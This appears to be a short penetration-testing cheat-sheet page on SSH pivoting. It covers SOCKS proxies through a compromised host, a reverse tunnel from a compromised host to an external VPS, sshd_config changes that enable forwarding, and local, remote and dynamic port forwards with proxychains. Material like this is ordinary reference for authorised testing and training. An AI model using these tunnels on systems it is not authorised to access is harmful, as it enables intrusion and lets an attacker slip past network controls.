SSH

Proxy through compromised host on the same network

# On attacker machine
ssh -D1337 -p <SSH-PORT> <USERNAME>@<TARGET-MACHINE>

# Change /etc/ssh/sshd_config on target machine
GatewayPorts yes
AllowTcpForwarding yes

# Edit /etc/proxychains4.conf file on the attacker machine and add following line
socks5	127.0.0.1 1337

Proxy from compromised host through external VPS

# On compromised host
ssh -R1337 -p <SSH-PORT> <USERNAME>@<VPS IP>

# On attacker machine
sudo ssh -L1337:127.0.0.1:1337 <USERNAME>@<VPS IP> -p <SSH-PORT>

# Change /etc/ssh/sshd_config on VPS
GatewayPorts yes
AllowTcpForwarding yes

Local port forward

sudo ssh -N -L 0.0.0.0:<kali port>:<remote ip>:<remote port> <username>@<remote ip>

Remote port forward

ssh -N -R <kali ip>:<kali port>:127.0.0.1:<local port> <kali username>@<kali ip>

Dynamic port forward

sudo ssh -N -D 127.0.0.1:8080 <username>@<remote ip>

# Edit proxychains config and add the following line
socks5	127.0.0.1 8080

PreviousRinetd NextPlink

Last updated 1 month ago